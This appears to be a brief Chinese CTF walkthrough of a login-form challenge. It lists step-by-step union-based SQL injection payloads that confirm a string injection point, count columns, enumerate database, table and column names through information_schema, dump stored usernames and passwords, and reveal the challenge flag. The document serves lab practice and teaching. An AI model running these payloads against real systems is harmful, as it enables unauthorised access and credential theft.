打开链接，出现登录框

首先用sql万能密码登录

使用MD5无法解密

测试注入点

判断注入点类型

password=e8671c7fcf1a0e6e8b0a14b267de947e

构造username，判断为字符型注入
admin' and '1'='1成功登录

admin' and '1'='2登陆失败

判断列数

admin' order by 3 #登录成功

admin' order by 4 #登录失败

可知共三个字段

判断显示位

构造username=a' union select 1,2,3 #

获取数据库名

构造a' union select 1,database(),3 #

获取表名

构造a' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

geekuser，l0ve1ysq1

获取列名

a' union select 1,2,column_name from information_schema.columns where table_name='l0ve1ysq1' #

获取数据

a' union select 1,2,group_concat(concat_ws('id',username,password)) from l0ve1ysq1 #

 得到flag{e2ad5e4d-53c2-4b8a-a9d8-5567ef2127f7}